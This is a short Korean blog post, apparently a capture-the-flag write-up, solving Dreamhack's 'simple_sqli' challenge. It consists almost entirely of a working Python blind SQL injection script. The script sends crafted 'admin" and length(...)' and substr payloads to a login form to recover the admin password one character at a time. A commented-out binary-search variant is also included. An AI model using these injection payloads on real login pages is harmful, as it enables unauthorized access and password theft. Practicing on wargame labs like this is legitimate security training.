728x90
dreamhack의 simple_sqli를 blind sql injection으로 풀어보았다.
import requests
URL="http://host3.dreamhack.games:11344/login"
#비밀번호 길이
password_length = 0
'''
def binsearch(low: int, high: int):
while 1:
mid = (low + high) // 2
if low + 1 >= high:
break
data = {"userid" : f"admin\" and length(userpassword) < {mid} -- ", "userpassword" : 1}
r = requests.post(URL, data=data)
if "admin" in r.text:
high = mid
else:
low = mid
return mid
print(binsearch(0, 100))
'''
while True:
password_length+=1
data = {"userid" : f"admin\" and length(userpassword) = {password_length} -- ", "userpassword" : 1}
r = requests.post(URL, data=data)
if "admin" in r.text:
print(password_length)
break
list = "1234567890abcdefghijklmnopqrstuvwxyz"
pw =""
for i in range(1, password_length+1):
for j in list:
uid = f'admin" and substr(userpassword, {i}, 1) = \'{j}\' -- '
data = {"userid" : uid, "userpassword" : 1}
r = requests.post(URL, data=data)
if "admin" in r.text:
pw += j
print(pw)
break
print(pw)
728x90
반응형
'Web Hacking > DreamHack' 카테고리의 다른 글
[DreamHack] Dream Gallery 풀이 (0) | 2024.04.16 |
---|---|
[Dreamhack] Mango 풀이 (0) | 2024.04.10 |
[DreamHack] xss-1 풀이 (0) | 2024.04.04 |
드림핵 XSS Filtering Bypass Advanced 풀이 (0) | 2023.12.29 |
드림핵 phpmyRedis 문제 (0) | 2023.11.24 |